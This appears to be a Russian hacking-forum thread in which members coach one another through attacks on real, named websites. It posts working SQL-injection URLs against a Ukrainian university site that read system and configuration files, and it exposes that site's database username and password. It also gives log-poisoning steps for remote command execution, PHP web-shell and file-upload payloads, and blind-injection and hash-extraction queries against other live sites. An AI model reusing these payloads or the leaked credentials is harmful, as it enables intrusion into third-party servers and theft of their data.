а по поводу include что то не понятно мне пока...
о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr
в php-файле, который исполняется есть строчки примерно такие:
mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET[id_doc]);
далее
$pole2 = присваивается значение 2 поля.
после этого идёт локаьный инклуд файла
main('../'.$pole2);
Мы запросом
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr
делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737377 64
это равно
../../../../../etc/passwd

соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
Что непонятно - спрашивай.

кстати а этот коментарий /* в запросе нельзя было использовать... Да выводит ошыбку, типа слеш служебный наверно. А че так??? да понятно что надо еще поросчихлять.
Хотя бы есть выбор:
--
{
%23
#

теперь догнал AFoST:). только не 0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737377 64, а 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 . Пробела нет перед 64. Оно наверно неправильно вставилось когда пост писался. Только что пропустил через bin2hex("../../../../../etc/passwd");. Кстати и что на ети данные дают интересно, как их использовать. что любой файл на хостинге прочитать можно это понятно. но это не GLOBAL INJECTION, толку от нее... Просто интересно для загального развития AFoST:
1. форум античата в длинных строках вставляет пробелы.
2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!

ребята что нам дает файл passwd. В принцыпе в гугде поискать не проблема,а так в 5-ти словах. Знаю что пароля там нет. Там выведено даные о пользователях и слубы или что ??? а пароль в файле shadow наскольку я знаю. Тоэсть не пароль а хешы паролей.

Ctacok , а что разве в mysql 5 версии { скобка это коментарий?
скобка не есть комментарий
файл passwd даст список юзеров системы, а иногда эта информация может помочь.

AFoST,чисто теоретический вопрос(думаю пост удален не будет): Возможно ли через лог файл поднять привилегии используя эту локальную иньекцию кода на сайте. Интересно все что после ? в URL будет записываться в лог. По умолчанию оно записываеться??? На денверер я обобщаю (апач) кажеться не.... А там допустим прописать <? system($_GET['cmd']); ?>, а потом подключить лог файл передав строку в HEX. И главный когда встретит инструкции PHP кода он их передаст интерпрератору таким образом получиться передавать переменную cmd через гет. А в значение прописывать команды DOS, допустим или linux. Я правц?
Да, это известный прием инклуда лог файла.
1. находим инклуд
2. находим логи /path/log/access_log
3. запрос с cmd на сайт http://site/? ...
4. инклудим через инклуд, найденный в п.1. access_log
http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia

upd ты права таким способом не поднимаешь, ты просто выполняешь php.

ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!

Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99

Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99
нет

Подкиньте статей по LFI. А то ничего найти не могу =(

Подкиньте статей по LFI. А то ничего найти не могу =(

Вот в общем на milw0rm'е: http://milw0rm.com/papers/260
Довольно свежая статья от M4g,а: http://www.xakep.ru/post/49508/default.asp
Замечание от .Slip'а: https://forum.antichat.ru/thread99589.html
Вот заметка от Raz0r'а: http://raz0r.name/articles/null-byte-alternative/
Вот от [x26]VOLAND: https://forum.antichat.ru/thread119481.html
Так-же в FAQ от jokester'а: https://forum.antichat.ru/thread104591.html

Strilo4ka, Начни с https://forum.antichat.ru/thread104591.html

Сам поищешь, или собрать для тебя по группам? Там карта раздела есть
https://forum.antichat.ru/forum30.html

Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (
знаете английский ?
нет такой таблицы

Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (
Ну во первых tablE
Во вторых, попробуй табличку users.
В третьих, жмяк (http://www.alleng.ru/english/chil.htm)

Ну во первых tablE

мб там таблица имеет название `tabla`

Я в деле sqlinj еще нуб, не так давно начал изучать работу с БД, так что прошу сильно не пинать
В общем есть один сайтег, пытаюсь провести инжекцию добавлением в пост запрос полей username и password значения value="1'", но страница загружается так как будто данные не введены или введены но не верны, также пытался в поле пароля вставить символ %. Результат тот же. Попробовал вписать в value="admin'<?php echo 123; ?>';" Результат тот же. Отсюда делаю вывод, что символ ' экранируется.
Кто что может еще предложить сделать

Я в деле sqlinj еще нуб, не так давно начал изучать работу с БД, так что прошу сильно не пинать
В общем есть один сайтег, пытаюсь провести инжекцию добавлением в пост запрос полей username и password значения value="1'", но страница загружается так как будто данные не введены или введены но не верны, также пытался в поле пароля вставить символ %. Результат тот же. Попробовал вписать в value="admin'<?php echo 123; ?>';" Результат тот же. Отсюда делаю вывод, что символ ' экранируется.
Кто что может еще предложить сделать
Ничего не сделаешь.

Сканер сказал, что в http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ возможна инъекция, но что я не пишу в запрос - в ответ ничего. Помогите, пожалуйста, советом.

Сканер сказал, что в http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ возможна инъекция, но что я не пишу в запрос - в ответ ничего. Помогите, пожалуйста, советом.

Сканер прав

http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+

Сканер прав

http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+
Видимо я мало понимаю, но где смотреть ответ сервера?

Видимо я мало понимаю, но где смотреть ответ сервера?
В даном случае, если условие true, значит выведется страница, если нет - не выведется.

Это называется blind -sql -inj

то есть при правильном запросе у тебя выдаст страницу которая должна быть, при не правильном , в твоем случае , вообще ни чего.
то есть при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+ выдаст страницу , а при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=4+--+ ни чего не выводит,

Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.

Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (
Всё просто, в текущей БД database нет таблицы tabla :)
Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.
_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+

_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+
Получается строка user пустая. Где тогда искать?

Patrik,
_http://forum.antichat.ru/thread119047.html , _https://forum.antichat.ru/threadnav35207-1-10.html

_http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100--
Пол царства за имя поля с паролем :)

Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???

Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
нет

Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ??? Возможно, если XSS внутри тега, к примеру:<a href="[XSS]">link</a>

в атрибутах тэгов, css-стилях, также не забываем про dom-based xss

_http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100--
Пол царства за имя поля с паролем :)

Омайгадэбл, ты сам то понял что написал?
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
Можно!

Омайгадэбл, ты сам то понял что написал?
Понял. Поля Password нету там. А как оно называется я подобрать не смог с кучи вариантов.
Если кто-то поможет довести до конца в ближайшее - я денег дам.

Понял. Поля Password нету там. А как оно называется я подобрать не смог с кучи вариантов.
Если кто-то поможет довести до конца в ближайшее - я денег дам.
Как же всё запущено, одно могу сказать, читай, читай, читай... поля пасворд где? :) ньде ...

Как же всё запущено, одно могу сказать, читай, читай, читай... поля пасворд где? :) ньде ...
не так уж и запущено, только имена таблицы и поля с паролем подобрать не выходит...

как в дле залить шелл через шаблон?

как в дле залить шелл через шаблон?
Впиши туда <? eval($_GET['c']) ?> .
Если фильтрации нету, то ?c=wget и т.п.

фильтрация..
ps есть еще доступ к админке в Coppermine Photo Gallery , на форуме смотрел баги, непрокатило, незнаю вот как туда еще можно шел вбить..

а просто from название_таблицы не судьба?

тогда

16+union+select+1,2,3,table_schema,5,6,7,8,9,10,11 ,12+from+information_schema.tables+where+table_nam e=0x6f73725f7573657273+limit+0,1


то, что выше, выучить как отче наш, а то, что выведет на экран, надо будет добавить к имени таблице, через точку, т.к. это будет БД, в которой лежит интересующая нас таблица

Результаты будут, если у текущего юзера будут соотвествующие права на доступ к интересующей БД, т.е. к примеру на запрос выше выдаст:

1321412354123_forum

тогда следующий запрос такой:

+union+select+1,2,3,concat(username,0x3b,password) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_u sers

если опять выдаст ошибку, вывода только два:

1. Записей в osr_users просто нет (==0)
2. нет прав доступа

Тут можно проверить только пункт 1:

+union+select+1,2,3,count(*) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_u sers

если выведется "0" - то дальше думаю объяснять не надо, значит таблица пустая

подскажите в чем проблема:
есть php скрипт который выполняет поиск в БД MySQL, содержимое запроса к БД примерно такое:

// так как самого кода скрипта нет, предполагаю, что код выглядит примерно так
$col1 = $_POST['col1'];
$col2 = $_POST['col2'];
mysql_query("SELECT * FROM `table` WHERE col1='".$col1."' AND col2='".$col2."' еще что-то");

вывода переменных нет.
я пытаюсь выполнить запрос к БД, что бы тот вернул мне результат true:
-1' OR LOCATE(1,(SUBSTRING(SELECT id FROM users WHERE id=1),1,1))#
В итоге запрос принимает форуме примерно такую:
SELECT * FROM `table` WHERE col1='-1' OR LOCATE(1,(SUBSTRING(SELECT id FROM users WHERE id=1),1,1))#' AND col2='1' еще что-то
Если я не ошибаюсь, то результат выполнения LOCATE должен вернуть true, т.к. id=1
Но в результате я получаю:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select id from users where id=1),1,1))#%' AND col2

Почему так?

Aртем:

1. Откуда ты узнал, что таблица users вообще существует?
2. Откуда ты узнал, что колонка id в таблице users вообще существует?
3. SUBSTRING подразумевает в конце всегда = чему-то, а у тебя просто запрос в скобочках.

Учи и, главное, понимай синтаксис MySql

Aртем:

1. Откуда ты узнал, что таблица users вообще существует?
2. Откуда ты узнал, что колонка id в таблице users вообще существует?
3. SUBSTRING подразумевает в конце всегда = чему-то, а у тебя просто запрос в скобочках.

Учи и, главное, понимай синтаксис MySql
Во-первых, можно выполнить запрос
-1' UNION SELECT id FROM users#
пусть это и Blind SQL, но включен отчет об ошибках, а это обозначает, что включив логику, можно банальным подбором таблиц/колонок выяснить, что есть, чего нет. Не будь таблицы users и колонки id, PHP интерпретатор вежливо объяснил бы мне, что либо колонки, либо таблицы нет. Но тот в свою очередь умело обработал нужный мне запрос и выдал нормальную страницу, без ошибок.
Во-вторых SUBSTRING ничего не подразумевает, он просто напросто выводит указанное количество символов из указанной строки начиная с указанного символа по счету.

Очень охота все же услышать ответ на мой вопрос.

Aртем

Скобок мало, посмотри на ошибку она синтаксическая, у тебя подзапрос без скобок, вот и ошибка
Вот так нужно:
id=-1+or+LOCATE(1,(SUBSTRING((SELECT+id+FROM+users+WHE RE+id=1),1,1)))


1. Откуда ты узнал, что таблица users вообще существует?
2. Откуда ты узнал, что колонка id в таблице users вообще существует?
3. SUBSTRING подразумевает в конце всегда = чему-то, а у тебя просто запрос в скобочках.

Учи и, главное, понимай синтаксис MySql
Последняя фраза в контексте поста просто потрясающая!

Паша, не пиши ты тут пожалуйста :)

jokester, спасибо, совсем не обратил внимание, что забыл подзапрос обрамить скобками.

Но возникла очередная проблема, видимо скрипт не хочет обрабатывать логические операторы OR и AND, т.к. после отправки запроса, браузер безнадежно ожидает ответа. А логика запроса по всей видимости не позволяет не использовать логический оператор И и ИЛИ. Как можно обойти их не прибегая к условиям?

посоветуйте брут для 4 версии,вывод идет в названии загружаемого файла.

3. SUBSTRING подразумевает в конце всегда = чему-то, а у тебя просто запрос в скобочках.
0-o да ладно?

Aртем
Давай линк и конечную цель.
Я не понимаю почему именно такой способ перебора?
Если ошибки не отключены, то можно вообще сделать вывод в ошибке если версия базы подходящая, а у тебя больше похоже на изврат, ну или я не понимаю целей.
И опять-же с трудом представляю, как могут не работать and и or. Так не бывает, что-то ты не правильно делаешь и скрипт тут не причём.

Aртем
Давай линк и конечную цель.
Я не понимаю почему именно такой способ перебора?
Если ошибки не отключены, то можно вообще сделать вывод в ошибке если версия базы подходящая, а у тебя больше похоже на изврат, ну или я не понимаю целей.
И опять-же с трудом представляю, как могут не работать and и or. Так не бывает, что-то ты не правильно делаешь и скрипт тут не причём.

> Я не понимаю почему именно такой способ перебора?
Это скорее всего не способ перебора, а проверка возможных фильтраций и реагирование скрипта на запросы.
Можно конечно перебирать основываясь на ошибки, можно даже использовать какой-нибудь специализированный софт или же что-нибудь подобное. Но меня интересует непосредственно ручная работа.
И линк к сожалению я дать не могу.
Но если кто-нибудь мне сможет дать уже готовых скриптов в которых есть уязвимости подобного характера, для повышения собственного уровня знаний в этом направлении буду благодарен.
Потому как с Blind SQL inj встречаюсь довольно редко, точнее старался их избегать, но как показала практика, знания в этой области мне необходимы, т.к. они попросту видимо отсутствуют, и еще был бы признателен на соответствующие статьи по поводу Blind SQL быть может я что-то упустил.

Здравствуйте уважаемые Гуру античата.
У меня возникла небольшая проблемка: нашел Sql-inj в джумле, все шикарно, только одно но:
union+select+1,2,3,group_concat(password),5+from+j os_users--
выводит пароли вида:
fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXn zVnvH0gMziLnCCx
С джумлой я что-то уже давно не встречался, может я что-то пропустил относительно того как хранится пароль в последних версиях? Версию джумлы кстати определить не удалось: файлик ___.php-dist или как его там, был честно переименован админом.
И если не сложно, если не сложно, дайте ссылку на пост где различные пути к конфигу апача лежат ибо /usr/local/apache/conf/httpd.conf находится в девственной неприкосновенности, а раскрытие путей нигде не нашел больше

Здравствуйте уважаемые Гуру античата.
У меня возникла небольшая проблемка: нашел Sql-inj в джумле, все шикарно, только одно но:
union+select+1,2,3,group_concat(password),5+from+j os_users--
выводит пароли вида:
fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXn zVnvH0gMziLnCCx
С джумлой я что-то уже давно не встречался, может я что-то пропустил относительно того как хранится пароль в последних версиях? Версию джумлы кстати определить не удалось: файлик ___.php-dist или как его там, был честно переименован админом.
И если не сложно, если не сложно, дайте ссылку на пост где различные пути к конфигу апача лежат ибо /usr/local/apache/conf/httpd.conf находится в девственной неприкосновенности, а раскрытие путей нигде не нашел больше
Вот здесь можно найти пути к log и config файлам:
http://forum.antichat.ru/thread49775.html

А хеш:
fec1d6a80adcaefd7e3823362dd89a00:wJpMRIYmjv7FBWdXn zVnvH0gMziLnCCx
Зашифрован алгоритмом md5($pass.$salt) который есть в программе PasswordsPro.
Администраторская панель находится чаще по адресу site/joompatch/administrator/ т.к. в Joomla сложно переименовать эту директорию.

Большое спасибо. Попробую пока конфиги почитать, мож найду абсолютный путь... а то не охота брутить его, хотя видюха с CUDA реально великая вещь в этом деле.

Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 2

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 3

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 4

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 5

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php(6) : regexp code on line 1

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php(6) : regexp code on line 1

Parse error: parse error, unexpected T_STRING in ..\..\..\..\\results.php(6) : regexp code on line 1

Fatal error: preg_replace(): Failed evaluating code: \x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y 7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWa d+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDN yxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ 5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06Po S+8WeQ70diFHiGW4ECPQjeeh1PmRV3OKDLxOWccQD8r2ykMNnY cB2uxPNRA3iNo9kel7vvj0zNgwgwJlIBwAKYIXUTB22DkTcuct oHnlq3tPjCIG3a2gfUmbOLG42DQBr6KO++dKFoE4aDFtr3pbB6 z+HbmtmfiK5s6E/7W0ZOjeQ8an107/txt252O3dneQMzwRxRkCaqwfde8CDuVIQ+fYgecTwZP0xz9Gmo C4++SVWAAPMJsfLBCG83jcRdJgB7597+xtctMYcQGOLcx1Yas7 IcfWJlx7HpKhcHIMBDBf4hpNZLaLA7nLnaHC4ML8yVtDF9 in ..\..\..\..\\results.php on line 6
шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..

лей <?php system($_GET[cmd]) ?> а через него зальеш уже все полноценный если надо будет

Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:

шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
Зачем сразу весь шелл? Для начала eval($_GET['c']);

а в вин как лить через кмд?

через команду ftp подконекться к своему фтпешнику и слей что нужно, или можеш попробывать создать нужный тебе файл примерно так

echo "<?php phpinfo(); ?>" > test.php

на том серве нет фтп, там ток ввв порт опен

на том серве нет фтп, там ток ввв порт опен
ты непонял, на том сервере фтп и ненадо ты с него подключаеш к левому и скачиваеш на тачку жетву.

всё спс, понял

чето не получается, я ввожу ftp и адрес, он просит логин.. но ввести я не могу, как быть?

пытался отключить экранирование, в хтаккес прописывал php_value magic_quotes_sybase 0
но сервер не реагирует на него почемуто..

если кто желает помочь) пишите в аську)

Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/


какая кмска? мамботс..чет знакомое.все диры 404

joomla очень похоже

какая кмска? мамботс..чет знакомое.все диры 404
Дай пару примеров ссылок.

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/

..................../prog_no.shtml
картинки в img
все...
а если папка админ 404 то гдеж админка?

..................../prog_no.shtml
картинки в img
все...
а если папка админ 404 то гдеж админка?
Joomla.

у joomla обычно админка в administrator

у joomla обычно админка в administrator
Вывод сделал опираясь на это :)

Да эт джумла.


/**
* CSS Document for offline page
* @version $Id: error.css 10387 2008-06-03 10:59:16Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software and parts of it may contain or be derived from the
* GNU General Public License or other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

/* Start Common Styles */




и такая фигня иногда выскакивает




Вы не можете посетить текущую страницу потому, что:

1. просроченная закладка/избранное
2. поисковый механизм, у которого просрочен список для этого сайта
3. пропущен адрес
4. у вас нет прав на эту страницу
5. Запрашиваемый ресурс не был найден.
6. В процессе обработки вашего запроса произошла ошибка.

Пожалуйста, попробуйте одну из следующих страниц:

* Домашняя страница

Если у вас возникли сложности, пожалуйста, свяжитесь с Администратором этого сайта.

Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:

шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
пользуй into dumpfile а не into outfile

Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:

WordPress database error: [You have an error in your SQL syntax near 'select 1)/* AND crnt.category_id = 16' at line 5]
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =-15 or 1=(select 1)/* AND crnt.category_id = 16


И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*

Как тут можно получить пароль из wp_users?

---
Вопрос снят. Ответ - Никак :)

M1ks, если file_upload=On, то можно намного проще сделать.
Заливаешь через свою уязвимость

<?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>


И заливаешь любой файл со своего компа

ребята подскажите где лежыт PHP.ini на linux по умолчанию!!!???

Strilo4ka, смотря какая ОС и как сервер настроен.

/etc/php.ini (Red Hat Linux, SuSE / Novell Linux)
/etc/php4/apache/php.ini (Debian woody and sarge, Ubuntu 6.10 с php4 и apache 1.3)
/etc/php5/apache2/php.ini (Ubuntu 6.10 с php5 и apache2, Debian etch)
/etc/httpd/php.ini (Trustix Secure Linux 3.0)
/usr/local/php/lib/php.ini (Mac OS X использующий пакет Marc Liyanage's PHP)
/etc/apache/php.ini (Slackware 10.x)
/var/www/conf/php.ini (OpenBSD)
/usr/local/etc/php.ini (FreeBSD)
/usr/pkg/etc/php.ini (NetBSD)
Gentoo Linux:
/etc/php/apache2-php4/php.ini
/etc/php/cli-php4/php.ini
/etc/apache2/php.ini

Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:


И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*

Как тут можно получить пароль из wp_users?

---
Вопрос снят :)
3 мускул ,мда редкий зверь .
без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов

http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+1,load_file(0x2f6574632f7068702e6 96e69),3,4,5--+

используй load_file()
Далее манимулируй для полного вывода данных.

ВСЕ можна вывести через первый столбец:

http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7068702e696 e69),2,3,4,5--+

> Я не понимаю почему именно такой способ перебора?
Это скорее всего не способ перебора, а проверка возможных фильтраций и реагирование скрипта на запросы.
Можно конечно перебирать основываясь на ошибки, можно даже использовать какой-нибудь специализированный софт или же что-нибудь подобное. Но меня интересует непосредственно ручная работа.
И линк к сожалению я дать не могу.
Но если кто-нибудь мне сможет дать уже готовых скриптов в которых есть уязвимости подобного характера, для повышения собственного уровня знаний в этом направлении буду благодарен.
Потому как с Blind SQL inj встречаюсь довольно редко, точнее старался их избегать, но как показала практика, знания в этой области мне необходимы, т.к. они попросту видимо отсутствуют, и еще был бы признателен на соответствующие статьи по поводу Blind SQL быть может я что-то упустил.
Хотелось бы услышать ответ на мой вопрос.

Хотелось бы услышать ответ на мой вопрос.
Тут нет никакого вопроса. Ты не первый день на форуме. Статьи все в разделе СТАТЬИ, а слепые скули, конечно тебе никто собирать не будет. Поиск по теме SQL думаю поможет нарыть кучу примеров, в конце концов на локалке напиши скрипт и тренируйся, если интересно. И не обязательно искать слепые, можешь на любой пробовать, просто расскручивай её как будто вывода нет, вот и вся практика.

Артем, если вопрос был про and/or, то:
1. true'>if(locate(1,(substring((select+id+from+users+where +id=1),1,1))),0,1)
2. false' union select * from table where locate(...)
если про практику, то ответ в последней строчке постом выше

может так легче?

http://www.univd.edu.ua/serverdb.inc

?php
//$server = "80.73.1.156";
$server = "localhost";
$user = "univd";
$pwd = "biohazard";
//$server = "localhost:3306";
//$user = "cardinal";
//$pwd = "cfiekz";
$con = mysql_connect($server, $user, $pwd);
mysql_select_db("univd", $con);
$maxbook = 10;
?>

http://www.univd.edu.ua/dumper/dumper.php

блин помогите найти логи какие нибуть на _http://www.univd.edu.ua/.
?>

toolza, 7 пункт главного меню, 6 метод, только гет методом, но там ничего интересного нет:


/etc/ssh/sshd_config
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7373682f737 368645f636f6e666967),2,3,4,5--+
------------------------------------
/etc/passwd
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f70617373776 4),2,3,4,5--+
------------------------------------
/etc/vsftpd.chroot_list
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f76736674706 42e6368726f6f745f6c697374),2,3,4,5--+
------------------------------------
/etc/my.cnf
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f6d792e636e6 6),2,3,4,5--+
------------------------------------
/etc/vsftpd.conf
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f76736674706 42e636f6e66),2,3,4,5--+
------------------------------------
/usr/bin/grep
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f7573722f62696e2f677 26570),2,3,4,5--+


а вообще там менты, так что поаккуратней

https://forum.antichat.ru/thread148915.html

http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2F686F6D652F736E616B6 52F756E6976642F756E6976642F646F63756D656E742F696E6 465782E706870),2,3,4,5--+
прочитал : /home/snake/univd/univd/document/index.php

include ($path_pars . 'structure/tools_st.inc');

http://www.univd.edu.ua/structure/tools_st.inc

include ($path_pars .'serverdb.inc')

возможно ли найти PHPMyAdmin интересно, есть какие нить програмы что его ищут!!!???
http://google.ru/

site:домен_жертвы phpmyadmin

Если админ норм, то ненайдёшь, посмотри у хостера.

Простенький сканер каталога phpMyAdmin

http://dumpz.org/13615/

+ часто бывает пхп админ прячут на нулевом домене,тут только реверс айпи поможет(как повезет)
Strilo4ka тут больше соображалка играет роль,и нормальный словарь директорий
может поможет
univd.edu.ua/dumper/dumper.php

пользуй into dumpfile а не into outfile

Я пробую на локалке у себя, у меня всё пашет, а когда уже на удаленке, то ошибка выскакивает, хотя запрос тотже,
#1064 - You have an error in your SQL syntax near '' at line 1


M1ks, если file_upload=On, то можно намного проще сделать.
Заливаешь через свою уязвимость

<?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>


И заливаешь любой файл со своего компа

Там походу офф, неработает чегото

Когда делаю ифрейм,на сайте появляется ошибка -Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homez.194/fromagero/www/includes/defines.php:3) in /homez.194/**/www/libraries/joomla/session/session.php on line 423

И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*

Как тут можно получить пароль из wp_users?

---
Вопрос снят. Ответ - Никак :)
погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
profile.php?id=2+and+length(user_pass)>0
пароль:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот (http://forum.antichat.ru/thread19844.html) замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.

Я пробую на локалке у себя, у меня всё пашет, а когда уже на удаленке, то ошибка выскакивает, хотя запрос тотже,
#1064 - You have an error in your SQL syntax near '' at line 1




Там походу офф, неработает чегото

Зри конфиг пхн, наверняка у тебя на локалке magic_quotes=off, а на удаленке - ON.

млин, и че же делать..

Искать другие способы загрузки файка. Кавычки экранизируются, заюзать инто оутфайл и инто дампфайл не выйдет. Прийдется искать либо админку, если есть возможность залить с нее - все ок, если нет - ищи другие баги, но не факт, что найдешь..

outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм

outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм

что экранируется? Ты хотя бы <?phpinfo();?> можешь залить? Будет показываться phpinfo() ?

outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм

омг, что значит работает, но екранизируется?
